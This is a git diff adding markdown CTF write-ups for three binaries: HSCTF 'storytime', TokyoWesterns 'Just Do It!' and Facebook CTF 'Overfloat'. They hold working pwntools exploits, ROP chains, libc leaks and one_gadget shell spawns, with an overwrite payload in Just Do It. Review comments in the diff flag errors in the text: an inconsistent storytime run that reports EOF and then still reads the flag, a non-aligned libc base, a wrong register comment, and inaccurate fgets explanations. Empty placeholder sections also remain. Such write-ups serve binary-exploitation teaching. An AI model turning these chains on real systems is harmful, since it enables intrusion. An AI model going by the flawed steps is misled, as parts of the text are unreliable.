+What happened here is that we first set the breakpoint to be after the read call, and then we ran the binary, gave it an easy to remember pattern (13371337) and then we hit our breakpoint. Now let's search where our pattern is in the memory:
+
+
+ gef➤ search-pattern 13371337
+ [+] Searching '13371337' in memory
+ [+] In '[stack]'(0x7ffffffde000-0x7ffffffff000), permission=rw-
+ 0x7fffffffdf00 - 0x7fffffffdf08 → "13371337[...]"
+
+ gef➤ info frame
+ Stack level 0, frame at 0x7fffffffdf38:
+ rip = 0x40069c in main; saved rip = 0x7ffff7df4b25
+ Arglist at unknown address.
+ Locals at unknown address, Previous frame's sp is 0x7fffffffdf40
+ Saved registers:
+ rip at 0x7fffffffdf38
+
+
+
+So here we see that our pattern is located at **0x7fffffffdf00** and the return address is at **0x7fffffffdf38** so we can now calculate the offset between the 2 with python's hex() function easily:
+
+
+ [ 192.168.0.18/24 ] [ /dev/pts/17 ] [Nextcloud/blog]
+ → python3
+ Python 3.9.2 (default, Feb 20 2021, 18:40:11)
+ [GCC 10.2.0] on linux
+ Type "help", "copyright", "credits" or "license" for more information.
+ >>> hex( 0x7fffffffdf00 - 0x7fffffffdf38 )
+ '-0x38'
+
+
+
+And we get a 0x38 bytes offset between the start of our input and the return address. Now for the write libc infoleak, we need to make use of the following registers:
+
+
+ rdi 0x1 (stdout file handle)
+ rsi got address entry for write
+ rdx value => 8
+
+
+
+Since PIE isn't enabled, we know the address of the got entry without needing a PIE infoleak. Looking at the assembly code leading up to the ret instruction which gives us code execution, we can see that the **rdx** register is set to 0x190 whgich will fit our needs:
+
+
+ 00400680 48 8d 45 d0 LEA RAX=>local_38,[RBP + -0x30]
+ 00400684 ba 90 01 MOV EDX,0x190
+ 00 00
+ 00400689 48 89 c6 MOV RSI,RAX
+ 0040068c bf 00 00 MOV EDI,0x0
+ 00 00
+ 00400691 e8 1a fe CALL read ssize_t read(int __fd, void * __
+
+
+
+Now for the got entry of **write** in the rsi register, we see that there is a rop gadget that will allow us to pop it into the register. It will also pop a value into the r15 register, however we just need to include another 8 byte qword in our rop chain for that so it doesn't change anything:
+
+
+ [ 192.168.0.18/24 ] [ /dev/pts/17 ] [binexp/2/hs]
+ → ROPgadget --binary storytime| grep rsi
+ 0x0000000000400701 : pop rsi ; pop r15 ; ret
+
+
+
+Now for the last register (1 in rdi) we can jump to 0x400601 which is in the middle of the end function:
+
+
+ void end(void)
+
+ {
+ write(1,"The End!\n",0x28);
+ return;
+ }
+
+
+
+The instruction we jump back to will **mov 0x1 into edi** and then call **write** which will give us our infoleak:
+
+
+ 004005fa 48 8d 35 LEA RSI,[s_The_End!_00400761] = "The End!\n"
+ 60 01 00 00
+ 00400601 bf 01 00 MOV EDI,0x1
+ 00 00
+ 00400606 e8 95 fe CALL write ssize_t write(int __fd, void * _
+ ff ff
+ 0040060b 90 NOP
+ 0040060c 5d POP RBP
+ 0040060d c3 RET
+
+
+
+So it will return and then continue with our ropchain, however before it does that, it will pop a value off of our chain into the rbp register so we will need to include a 8 bytes qword in our ropchain at that point. for where to jump to, we choose **0x40060e** since it is the beginning of the **climax** function:
+
+
+
+
+ void climax(void)
+
+ {
+ undefined local_38 [48];
+
+ read(0,local_38,4000);
+ return;
+ }
+
+
+
+This function will give us a buffer overflow where we can overwrite the return address with a onegadget and spawn a shell. Now let's find the onegadget from the base of libc, to choose which ones to use we can just guess and check
+
+
+ [ 192.168.0.18/24 ] [ /dev/pts/17 ] [binexp/2/hs]
+ → one_gadget libc.so.6
+ 0x45216 execve("/bin/sh", rsp+0x30, environ)
+ constraints:
+ rax == NULL
+
+ 0x4526a execve("/bin/sh", rsp+0x30, environ)
+ constraints:
+ [rsp+0x30] == NULL
+
+ 0xf02a4 execve("/bin/sh", rsp+0x50, environ)
+ constraints:
+ [rsp+0x50] == NULL
+
+ 0xf1147 execve("/bin/sh", rsp+0x70, environ)
+ constraints:
+ [rsp+0x70] == NULL
+
+
+
+So with all of this, we end up with the following exploit:
+
+
+ [ 192.168.0.18/24 ] [ /dev/pts/17 ] [binexp/2/hs]
+ → vim exploit.py
+
+
+
+
+ from pwn import *
+
+ target = process('./storytime')
+ libc = ELF('libc.so.6')
+
+ popRsiR15 = p64(0x400701)
+ writeGot = p64(0x601018)
+ payload = b"\x00"*0x38
+
+ # Pop the got entry of write into r15
+ payload += popRsiR15
+ payload += writeGot
+ payload += p64(0x3030303030303030) # Filler value will be popped into r15
+
+ # Right before write call in end
+ payload += p64(0x400601)
+
+ # Filler value that will be popped off in end
+ payload += p64(0x3030303030303030)
+
+ # Address of climax, we will exploit another buffer overflow to use the rop gadget
+ payload += p64(0x40060e)
+
+ target.sendline(payload)
+ print(target.recvuntil("Tell me a story: \n"))
+
+ # Scan in and filter out the libc infoleak, calculate base of libc
+ leak = u64(target.recv(8))
+ base = leak - libc.symbols["write"]
+ print(hex(base))
+
+ # Calculate the oneshot gadget
+ oneshot = base + 0x4526a
+
+ # Make the payload for the onshot gadget
+ payload = b"\x00"*0x38 + p64(oneshot)
+
+ # Send it and get a shell
+ target.sendline(payload)
+ target.interactive()
+
+
+
+
+ [ 192.168.0.18/24 ] [ /dev/pts/17 ] [binexp/2/hs]
+ → python3 original.py
+ [+] Starting local process './storytime': pid 1570923
+ [*] '/home/nothing/binexp/2/hs/libc.so.6'
+ Arch: amd64-64-little
+ RELRO: Partial RELRO
+ Stack: Canary found
+ NX: NX enabled
+ PIE: PIE enabled
+ b'HSCTF PWNNNNNNNNNNNNNNNNNNNN\nTell me a story: \n'
+ 0x7f1b59432e30
+ [*] Switching to interactive mode
+ @\xa0RY\x1b\x7f\x00\xf0KY\x1b\x7f\x00\x00\x00\x00\x00\x00\x00\x00\x00 \xc5_Y\x1b\x7f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0[*] Got EOF while reading in interactive
+ $ cat flag.txt
+ hsctf{th4nk7_f0r_th3_g00d_st0ry_yay-314879357}
+
+
+And that's it ! we managed to capture the flag.
+
+## Title
+
+text
+
+
+
+
+` ![]()
+
+## Title
+
+text
+
+
+
+
+` ![]()
+
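Review bot: the value printed as the libc base at the end of this hunk, `0x7f1b59432e30`, is not page-aligned, so `base = leak - libc.symbols["write"]` is subtracting the `write` offset of a `libc.so.6` that is not the library actually mapped into the target: `process('./storytime')` is started without `LD_PRELOAD` or a loader-patched copy of the binary, so the system libc is used, while both the symbol offsets and the `one_gadget` offset `0x4526a` come from the file in the working directory. The `[*] Got EOF while reading in interactive` that follows is what a crash on a wrong gadget address looks like, not a shell, and the `$ cat flag.txt` output after the child has reported EOF is hard to reconcile with that transcript; the run should be repeated with the bundled libc loaded (via `env={'LD_PRELOAD': './libc.so.6'}`, or a copy of the binary patched to use the matching `ld.so`, since a libc from another glibc release usually needs its own loader) and with `assert base & 0xfff == 0` after the computation so a mismatch fails loudly. Smaller points in the same hunk: the comment `# Pop the got entry of write into r15` is wrong, the gadget `pop rsi ; pop r15 ; ret` puts the GOT address in `rsi` and the filler in `r15`; `writeGot = p64(0x601018)` is never derived in the text, an `objdump -R storytime | grep write` line would document it the way the Overfloat writeup does for `puts`; `hex( 0x7fffffffdf00 - 0x7fffffffdf38 )` has its operands reversed, which is why the result is `'-0x38'`; and the file being edited is `exploit.py` while the run invokes `python3 original.py`.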
diff --git a/2/just.md b/2/just.md
new file mode 100644
index 0000000..02025c3
--- /dev/null
+++ b/2/just.md
@@ -0,0 +1,272 @@
+# Tokyo Western 2017 - Just Do It!
+
+## Downloading the binary file
+
+
+ [ 192.168.100.126/24 ] [ /dev/pts/1 ] [binexp/2/justdoit]
+ → wget https://github.com/guyinatuxedo/nightmare/raw/master/modules/04-bof_variable/tw17_justdoit/just_do_it
+ --2021-02-23 15:25:50-- https://github.com/guyinatuxedo/nightmare/raw/master/modules/04-bof_variable/tw17_justdoit/just_do_it
+ Resolving github.com (github.com)... 140.82.121.4
+ Connecting to github.com (github.com)|140.82.121.4|:443... connected.
+ HTTP request sent, awaiting response... 302 Found
+ Location: https://raw.githubusercontent.com/guyinatuxedo/nightmare/master/modules/04-bof_variable/tw17_justdoit/just_do_it [following]
+ --2021-02-23 15:25:51-- https://raw.githubusercontent.com/guyinatuxedo/nightmare/master/modules/04-bof_variable/tw17_justdoit/just_do_it
+ Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 185.199.109.133, 185.199.111.133, 185.199.110.133, ...
+ Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|185.199.109.133|:443... connected.
+ HTTP request sent, awaiting response... 200 OK
+ Length: 7792 (7.6K) [application/octet-stream]
+ Saving to: ‘just_do_it’
+
+ just_do_it 100%[=======================================================================================================================================================================================================>] 7.61K --.-KB/s in 0s
+
+ 2021-02-23 15:25:51 (35.9 MB/s) - ‘just_do_it’ saved [7792/7792]
+
+
+ [ 192.168.100.126/24 ] [ /dev/pts/1 ] [binexp/2/justdoit]
+ → file just_do_it
+ just_do_it: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=cf72d1d758e59a5b9912e0e83c3af92175c6f629, not stripped
+
+ [ 192.168.100.126/24 ] [ /dev/pts/1 ] [binexp/2/justdoit]
+ → chmod +x just_do_it
+
+
+
+` ![]()
+
+## Solution
+
+First of all, let's run the binary file to see what it does:
+
+
+ [ 192.168.100.126/24 ] [ /dev/pts/1 ] [binexp/2/justdoit]
+ → ./just_do_it
+ Welcome my secret service. Do you know the password?
+ Input the password.
+ not_the_password
+ Invalid Password, Try Again!
+
+
+
+Again, this is the kind of binary files that wants us to give them the correct password, so it's time to checksec it and see what ghidra finds:
+
+
+ [ 192.168.100.126/24 ] [ /dev/pts/1 ] [binexp/2/justdoit]
+ → pwn checksec just_do_it
+ [*] '/home/nothing/binexp/2/justdoit/just_do_it'
+ Arch: i386-32-little
+ RELRO: Partial RELRO
+ Stack: No canary found
+ NX: NX enabled
+ PIE: No PIE (0x8048000)
+
+
+
+` 
+
+
+ undefined4 main(void)
+
+ {
+ char *pcVar1;
+ int iVar2;
+ char local_28 [16];
+ FILE *local_18;
+ char *local_14;
+ undefined *local_c;
+
+ local_c = &stack0x00000004;
+ setvbuf(stdin,(char *)0x0,2,0);
+ setvbuf(stdout,(char *)0x0,2,0);
+ setvbuf(stderr,(char *)0x0,2,0);
+ local_14 = failed_message;
+ local_18 = fopen("flag.txt","r");
+ if (local_18 == (FILE *)0x0) {
+ perror("file open error.\n");
+ /* WARNING: Subroutine does not return */
+ exit(0);
+ }
+ pcVar1 = fgets(flag,0x30,local_18);
+ if (pcVar1 == (char *)0x0) {
+ perror("file read error.\n");
+ /* WARNING: Subroutine does not return */
+ exit(0);
+ }
+ puts("Welcome my secret service. Do you know the password?");
+ puts("Input the password.");
+ pcVar1 = fgets(local_28,0x20,stdin);
+ if (pcVar1 == (char *)0x0) {
+ perror("input error.\n");
+ /* WARNING: Subroutine does not return */
+ exit(0);
+ }
+ iVar2 = strcmp(local_28,PASSWORD);
+ if (iVar2 == 0) {
+ local_14 = success_message;
+ }
+ puts(local_14);
+ return 0;
+ }
+
+
+here we have the code of the main function and we see something: first of all it checks if flag.txt is here, and then it prompts for our text input, putting it in the local_28 variable, and then later on, our input text (local_28) gets compared to the PASSWORD variable, so let's double click it in ghidra to see what it contains:
+
+
+
+
+ PASSWORD XREF[2]: Entry Point(*), main:080486d0(R)
+ 0804a03c c8 87 04 08 addr s_P@SSW0RD_080487c8 = "P@SSW0RD"
+
+
+
+now in the code we see something particular:
+
+
+ pcVar1 = fgets(local_28,0x20,stdin);
+ if (pcVar1 == (char *)0x0) {
+ perror("input error.\n");
+ /* WARNING: Subroutine does not return */
+ exit(0);
+
+
+
+So our input text passes into an fget call, which means that even though we have the password, the fgets call will append a newline character (0x0a) at the end, so to pass the check we need a nullbyte after P@SSW0RD, to do so we will use python:
+
+
+ [ 192.168.100.126/24 ] [ /dev/pts/2 ] [binexp/2/justdoit]
+ → ./just_do_it
+ Welcome my secret service. Do you know the password?
+ Input the password.
+ P@SSW0RD
+ Invalid Password, Try Again!
+
+ [ 192.168.100.126/24 ] [ /dev/pts/2 ] [binexp/2/justdoit]
+ → python -c 'print "P@SSW0RD" + "\x00"'
+ P@SSW0RD
+
+ [ 192.168.100.126/24 ] [ /dev/pts/2 ] [binexp/2/justdoit]
+ → python -c 'print "P@SSW0RD" + "\x00"' | ./just_do_it
+ Welcome my secret service. Do you know the password?
+ Input the password.
+ Correct Password, Welcome!
+
+
+
+Now here we basically managed to pass the check, but that's not it, we see from the disassembly code that the fgets call can input 32 bytes worth of data (looking at the stack below : 0x28 - 0x18 = 16 (since it's hexadecimal)).
+
+
+
+with this we can reach the output message being printed with a puts call, right before the function returns, so let's take another look at the code portion where flag.txt is handled:
+
+
+ local_18 = fopen("flag.txt","r");
+ if (local_18 == (FILE *)0x0) {
+ perror("file open error.\n");
+ /* WARNING: Subroutine does not return */
+ exit(0);
+ }
+ pcVar1 = fgets(flag,0x30,local_18);
+ if (pcVar1 == (char *)0x0) {
+ perror("file read error.\n");
+ /* WARNING: Subroutine does not return */
+ exit(0);
+ }
+
+
+
+What we see here is that after it opens the flag.txt file, it scans in 48 bytes (here its 0x30 bytes in hexa). So the idea here is to find the address of where the flag file is stored, and then, to overwrite the value of the output message (puts call) with it to print the contents of flag:
+
+
+ flag XREF[2]: Entry Point(*), main:08048650(*)
+ 0804a080 00 00 00 undefine
+ 00 00 00
+ 00 00 00
+ 0804a080 00 undefined100h [0] XREF[2]: Entry Point(*), main:08048650(*)
+ 0804a081 00 undefined100h [1]
+
+ [...]
+
+ 0804a0aa 00 undefined100h [42]
+ 0804a0ab 00 undefined100h [43]
+ 0804a0ac 00 undefined100h [44]
+ 0804a0ad 00 undefined100h [45]
+ 0804a0ae 00 undefined100h [46]
+ 0804a0af 00 undefined100h [47]
+
+
+
+After double clicking on the flag variable, we get the code above, so we know that flag is at the address 0x0804a080, now if we look at the beginning of main, we see that the input variable (local_28) and the output message (local 14) are separated by 20 bytes worth of data:
+
+
+
+
+ **************************************************************
+ * FUNCTION *
+ **************************************************************
+ undefined main(undefined1 param_1)
+ undefined AL:1
+ undefined1 Stack[0x4]:1 param_1 XREF[1]: 080485bb(*)
+ undefined4 Stack[0x0]:4 local_res0 XREF[1]: 080485c2(R)
+ undefined4 Stack[-0xc]:4 local_c XREF[1]: 08048704(R)
+ undefined4 Stack[-0x14]:4 local_14 XREF[2]: 0804860d(W),
+ 080486ee(W)
+ undefined4 Stack[-0x18]:4 local_18 XREF[3]: 08048625(W),
+ 08048628(R),
+ 0804864b(R)
+ undefined1 Stack[-0x28]:1 local_28 XREF[2]: 080486a6(*),
+ 080486d9(*)
+ main XREF[4]: Entry Point(*),
+ _start:080484d7(*), 0804886c,
+ 080488c8(*)
+ 080485bb 8d 4c 24 04 LEA ECX=>param_1,[ESP + 0x4]
+
+
+
+Now let's highlight just the parts we need:
+
+
+
+0x28 - 0x14 = 20 bytes, so let's create a payload that has 20 null bytes:
+
+
+ [ 192.168.100.126/24 ] [ /dev/pts/1 ] [binexp/2/justdoit]
+ → python -c 'print "\x00"*20 + "\x80\xa0\x04\x08"'
+
+
+ [ 192.168.100.126/24 ] [ /dev/pts/1 ] [binexp/2/justdoit]
+ → python -c 'print "\x00"*20 + "\x80\xa0\x04\x08"' | xxd
+ 00000000: 0000 0000 0000 0000 0000 0000 0000 0000 ................
+ 00000010: 0000 0000 80a0 0408 0a .........
+
+
+
+here we can see with xxd what the payload looks like, now let's try it on the binary:
+
+
+ [ 192.168.100.126/24 ] [ /dev/pts/1 ] [binexp/2/justdoit]
+ → python -c 'print "\x00"*20 + "\x80\xa0\x04\x08"' | ./just_do_it
+ Welcome my secret service. Do you know the password?
+ Input the password.
+ flag{g0ttem_b0yz}
+
+
+
+And there we have it!
+
+## Title
+
+text
+
+
+
+
+` ![]()
+
+## Title
+
+text
+
+
+
+
+` ![]()
+
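Review bot: the explanation `the fgets call will append a newline character (0x0a) at the end` is inaccurate: `fgets` appends nothing, it keeps the newline that arrives with the input, so `strcmp(local_28,PASSWORD)` compares `"P@SSW0RD\n"` with `"P@SSW0RD"`, and the injected NUL works because `strcmp` stops at it before reaching the `\n`. The sentence `the fgets call can input 32 bytes worth of data (looking at the stack below : 0x28 - 0x18 = 16 (since it's hexadecimal))` mixes two quantities: `fgets(local_28,0x20,stdin)` stores at most 31 characters plus a terminating NUL, whereas `0x28 - 0x18 = 0x10` is the 16-byte size of `local_28` itself (matching `char local_28 [16]`); likewise `fgets(flag,0x30,local_18)` reads at most 47 characters, not 48. The overwrite step would read better with the reason it is safe: the 20-byte filler covers `local_28` and then `local_18` (the `FILE *` at `Stack[-0x18]`), which is never used again after `fgets(flag,0x30,local_18)`, before the four address bytes land in `local_14` at `Stack[-0x14]` and `puts(local_14)` prints from `0x0804a080`. Finally, the `python -c 'print "..."'` one-liners are Python 2 syntax; the same payload under Python 3 is `python3 -c 'import sys; sys.stdout.buffer.write(b"\x00"*20 + b"\x80\xa0\x04\x08" + b"\n")'`.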
diff --git a/2/overf.md b/2/overf.md
new file mode 100644
index 0000000..acb6d33
--- /dev/null
+++ b/2/overf.md
@@ -0,0 +1,396 @@
+# Facebook CTF 2019 Overfloat
+
+## Downloading the binary file
+
+
+ [ 192.168.0.18/24 ] [ /dev/pts/2 ] [binexp/2/overf]
+ → wget -q https://github.com/guyinatuxedo/nightmare/raw/master/modules/08-bof_dynamic/fb19_overfloat/overfloat
+
+ [ 192.168.0.18/24 ] [ /dev/pts/2 ] [binexp/2/overf]
+ → wget -q https://github.com/guyinatuxedo/nightmare/raw/master/modules/08-bof_dynamic/fb19_overfloat/libc-2.27.so
+
+ [ 192.168.0.18/24 ] [ /dev/pts/2 ] [binexp/2/overf]
+ → wget -q https://github.com/guyinatuxedo/nightmare/raw/master/modules/08-bof_dynamic/fb19_overfloat/core
+
+ [ 192.168.0.18/24 ] [ /dev/pts/2 ] [binexp/2/overf]
+ → l
+ total 4.3M
+ drwxr-xr-x 2 nothing nothing 4.0K Mar 6 19:11 .
+ drwxr-xr-x 12 nothing nothing 4.0K Mar 6 19:10 ..
+ -rw-r--r-- 1 nothing nothing 2.3M Mar 6 19:11 core
+ -rw-r--r-- 1 nothing nothing 2.0M Mar 6 19:10 libc-2.27.so
+ -rw-r--r-- 1 nothing nothing 14K Mar 6 19:10 overfloat
+
+ [ 192.168.0.18/24 ] [ /dev/pts/2 ] [binexp/2/overf]
+ → file overfloat
+ overfloat: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=8ae8ef04d2948115c648531ee0c12ba292b92ae4, not stripped
+
+ [ 192.168.0.18/24 ] [ /dev/pts/2 ] [binexp/2/overf]
+ → chmod +x overfloat
+
+
+
+` ![]()
+
+## Solution
+
+Now let's start off by testing the binary after using pwn checksec on it:
+
+
+ [ 192.168.0.18/24 ] [ /dev/pts/2 ] [binexp/2/overf]
+ → pwn checksec overfloat
+ [*] '/home/nothing/binexp/2/overf/overfloat'
+ Arch: amd64-64-little
+ RELRO: Partial RELRO
+ Stack: No canary found
+ NX: NX enabled
+ PIE: No PIE (0x400000)
+
+ [ 192.168.0.18/24 ] [ /dev/pts/2 ] [binexp/2/overf]
+ → ./overfloat
+ _ .--.
+ ( ` )
+ .-' `--,
+ _..----.. ( )`-.
+ .'_|` _|` _|( .__, )
+ /_| _| _| _( (_, .-'
+ ;| _| _| _| '-'__,--'`--'
+ | _| _| _| _| |
+ _ || _| _| _| _|
+ _( `--.\_| _| _| _|/
+ .-' )--,| _| _|.`
+ (__, (_ ) )_| _| /
+ `-.__.\ _,--'\|__|__/
+ ;____;
+ \YT/
+ ||
+ |""|
+ '=='
+
+ WHERE WOULD YOU LIKE TO GO?
+ LAT[0]: 1
+ LON[0]: 2
+ LAT[1]: 3
+ LON[1]: 4
+ LAT[2]: 5
+ LON[2]: 6
+ LAT[3]: 7
+ LON[3]: 8
+ LAT[4]: 9
+ LON[4]: 10
+ LAT[5]: 0
+ LON[5]: 11
+ LAT[6]: 111111111111111111111111111111
+ LON[6]: 111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111
+ LAT[7]: LON[7]: 12334556778
+ LAT[8]: ^C
+
+
+
+So we cna see that we are given a 64bit, dynamically linked binary with a non-executable stack (NX). In addition to that, we are given the libc file **libc-2.27.so**. Running the program we see that it prompts us for latitude / longitude pairs, so let's check out what we can find when we reverse the file with ghidra:
+
+
+
+
+ undefined8 main(void)
+
+ {
+ undefined local_38 [48];
+
+ setbuf(stdout,(char *)0x0);
+ setbuf(stdin,(char *)0x0);
+ alarm(0x1e);
+ __sysv_signal(0xe,timeout);
+ puts(
+ " _ .--. \n ( ` ) \n .-\' `--, \n _..----.. ( )`-. \n .\'_|` _|` _|( .__, )\n /_| _| _| _( (_, .-\' \n ;| _| _| _| \'-\'__,--\'`--\' \n | _| _| _| _| | \n _ || _| _| _| _| \n _( `--.\\_| _| _| _|/ \n .-\' )--,| _| _|.` \n (__, (_ ) )_| _| / \n `-.__.\\ _,--\'\\|__|__/ \n ;____; \n \\YT/ \n || \n |\"\"| \n \'==\' \n\nWHERE WOULD YOU LIKE TO GO?"
+ );
+ memset(local_38,0,0x28);
+ chart_course(local_38);
+ puts("BON VOYAGE!");
+ return 0;
+ }
+
+
+
+Looking through the code here, we see that the part that's interesting is the char_course function, which takes the pointer local_38 as an arguement. When we look at the chart_course dissassembled function in ghidra we see the following:
+
+
+ void chart_course(long param_1)
+
+ {
+ int iVar1;
+ uint uVar2;
+ double dVar3;
+ char local_78 [104];
+ float local_10;
+ uint local_c;
+
+ local_c = 0;
+ do {
+ if ((local_c & 1) == 0) {
+ iVar1 = (int)local_c / 2;
+ uVar2 = iVar1 + ((iVar1 / 10 + ((int)(local_c - ((int)local_c >> 0x1f)) >> 0x1f)) -
+ (iVar1 >> 0x1f)) * -10;
+ printf("LAT[%d]: ",(ulong)uVar2,(ulong)uVar2);
+ }
+ else {
+ iVar1 = (int)local_c / 2;
+ uVar2 = iVar1 + ((iVar1 / 10 + ((int)(local_c - ((int)local_c >> 0x1f)) >> 0x1f)) -
+ (iVar1 >> 0x1f)) * -10;
+ printf("LON[%d]: ",(ulong)uVar2,(ulong)uVar2,(ulong)uVar2);
+ }
+ fgets(local_78,100,stdin);
+ iVar1 = strncmp(local_78,"done",4);
+ if (iVar1 == 0) {
+ if ((local_c & 1) == 0) {
+ return;
+ }
+ puts("WHERES THE LONGITUDE?");
+ local_c = local_c - 1;
+ }
+ else {
+ dVar3 = atof(local_78);
+ local_10 = (float)dVar3;
+ memset(local_78,0,100);
+ *(float *)(param_1 + (long)(int)local_c * 4) = local_10;
+ }
+ local_c = local_c + 1;
+ } while( true );
+ }
+
+
+
+Here we see that our data is being scanned into the char ptr that is being passed in the function as an arguement (param_1) It scans 100 bytes of data into local_78 thanks to the memset() function call
+
+
+ dVar3 = atof(local_78);
+ local_10 = (float)dVar3;
+ **memset(local_78,0,100);**
+ *(float *)(param_1 + (long)(int)local_c * 4) = local_10;
+
+
+after the memset call, it is setting ptr + (x * 4) equal to **float** where x is equal to the amount of floats already scanned in. There are no checks to see if the buffer gets overflowed, therefore, we have our buffer overflow right here.
+
+That is ran within a do{}while() loop, that on paper can run forever since we have **true** as the condition. However there the termination condition is if the first 4 bytes of our input are **done** as you can see below:
+
+
+ fgets(local_78,100,stdin);
+ iVar1 = strncmp(local_78,"done",4);
+
+
+Therefore, keep in mind that the buffer that we are overflowing is from the stack in the main function, so we need to return to the main function before we can get code execution. Now let's take a look at the stack in ghidra:
+
+
+ **************************************************************
+ * FUNCTION *
+ **************************************************************
+ undefined main()
+ undefined AL:1
+ undefined1 Stack[-0x38]:1 local_38 XREF[2]: 004009ed(*),
+ 00400a03(*)
+ undefined4 Stack[-0x3c]:4 local_3c XREF[1]: 0040099b(W)
+ undefined8 Stack[-0x48]:8 local_48 XREF[1]: 0040099e(W)
+ main XREF[5]: Entry Point(*),
+ _start:0040075d(*),
+ _start:0040075d(*), 00400ea0,
+ 00400f70(*)
+ 00400993 55 PUSH RBP
+
+
+
+Looking at the stack, there is nothing between local_38 (the variable of our input text) and the saved base pointer. Add on 8 bytes for the saved base pointer to the 48 bytes for the space, of our local_48 variable, and we get a total of **56** bytes to reach the return address. Now what code do we execute ? We're going to go with a ROP Chain using gadgets and imported functions from the binary since PIE is disabled, therefore we don't need an infoleak to do this. The problem is that the binary is not too big so we don't have the gadgets we would need to spawn a shell.
+
+To counter this, we can setup a **puts** call because it is an imported function, therefore we can call it with the **got address of puts** we can get a libc infoleak and then loop back around to the start of **main** which would allow us to exploit the same bug again witha libc infoleak. We can then write a onegadget to the return address to actually spawn a shell.
+
+
+ ****[ 192.168.0.18/24 ] [ /dev/pts/2 ] [binexp/2/overf]
+ → objdump -D overfloat| grep puts
+ 0000000000400690 <****puts@plt>:
+ 400690: ff 25 8a 19 20 00 jmp *0x20198a(%rip) # 602020 <****puts@GLIBC_2.2.5>
+ 400846: e8 45 fe ff ff call 400690 <****puts@plt>
+ 400933: e8 58 fd ff ff call 400690 <****puts@plt>
+ 4009e8: e8 a3 fc ff ff call 400690 <****puts@plt>
+ 400a14: e8 77 fc ff ff call 400690 <****puts@plt>
+
+So here we have the plt addrets of **puts** as **0x400690** Next we need the got entry address for puts:
+
+
+ [ 192.168.0.18/24 ] [ /dev/pts/2 ] [binexp/2/overf]
+ → objdump -R overfloat| grep puts
+ 0000000000602020 R_X86_64_JUMP_SLOT puts@GLIBC_2.2.5
+
+
+
+Now that we have the got entry address, we need a gadget that pops an arguement into rdi and then return:
+
+
+ [ 192.168.0.18/24 ] [ /dev/pts/2 ] [binexp/2/overf]
+ → ROPgadget --binary overfloat| grep ": pop rdi"
+ 0x0000000000400a83 : pop rdi ; ret
+
+
+
+After we get the libc infoleak, we can just subtract the offset of puts from it to get the libc base. The only part that remains is the onegadget, check out the previous babyboi writeup to know how to set it up [here](bboi.html):
+
+
+ [ 192.168.0.18/24 ] [ /dev/pts/2 ] [binexp/2/overf]
+ → one_gadget libc-2.27.so
+ 0x4f2c5 execve("/bin/sh", rsp+0x40, environ)
+ constraints:
+ rsp & 0xf == 0
+ rcx == NULL
+
+ 0x4f322 execve("/bin/sh", rsp+0x40, environ)
+ constraints:
+ [rsp+0x40] == NULL
+
+ 0x10a38c execve("/bin/sh", rsp+0x70, environ)
+ constraints:
+ [rsp+0x70] == NULL
+
+
+
+And with this, we have everything we need to build our exploit. Since all of our inputs are interpreted as floats, We have to jump through a few hoops to get our inputs correctly:
+
+
+ [ 192.168.0.18/24 ] [ /dev/pts/2 ] [binexp/2/overf]
+ → vim exploit.py
+
+
+
+
+ from pwn import *
+ import struct
+
+ # values of the rop chain
+ putsPlt = 0x400690
+ putsGot = 0x602020
+ popRdi = 0x400a83
+ startMain = 0x400993
+ oneShot = 0x4f2c5
+
+ #helper functions to help with the float input
+ pf = lambda x: struct.pack('f', x)
+ uf = lambda x: struct.unpack('f', x)[0]
+
+ #target process
+ target = process('./overfloat')
+ libc = ELF('libc-2.27.so')
+
+ #helper function to send input:
+ def sendVal(x):
+ v1 = x & ((2**32) - 1)
+ v2 = x >> 32
+ target.sendline(str(uf(p32(v1))))
+ target.sendline(str(uf(p32(v2))))
+
+ #fill up the space between the start of the input and the return address
+ for i in range(7):
+ sendVal(0xdeadbeefdeadbeef)
+
+ #send the ropchain to print the libc address of puts
+ #loop around to the start of main
+
+ sendVal(popRdi)
+ sendVal(putsGot)
+ sendVal(putsPlt)
+ sendVal(startMain)
+
+ # Send done so our code executes
+ target.sendline(b'done')
+
+ # Print out the target output
+ print(target.recvuntil(b'BON VOYAGE!\n'))
+
+ # Scan in, filter out the libc infoleak, calculate the base
+ leak = target.recv(6)
+ leak = u64(leak + b"\x00"*(8-len(leak)))
+ base = leak - libc.symbols['puts']
+
+ print("libc base: " + hex(base))
+
+ for i in range(7):
+ sendVal(0xdeadbeefdeadbeef)
+ # Overwrite the return address with a onegadget
+ sendVal(base + oneShot)
+
+ # Send done so our rop chain executes
+ target.sendline(b'done')
+
+ target.interactive()
+
+
+
+Now let's test it:
+
+
+ [ 192.168.0.18/24 ] [ /dev/pts/9 ] [binexp/2/overf]
+ → l
+ total 4.3M
+ drwxr-xr-x 2 nothing nothing 4.0K Mar 6 20:34 .
+ drwxr-xr-x 12 nothing nothing 4.0K Mar 6 19:10 ..
+ -rw-r--r-- 1 nothing nothing 2.3M Mar 6 19:11 core
+ -rw-r--r-- 1 nothing nothing 1.3K Mar 6 20:34 exploit.py
+ -rw-r--r-- 1 nothing nothing 2.0M Mar 6 19:10 libc-2.27.so
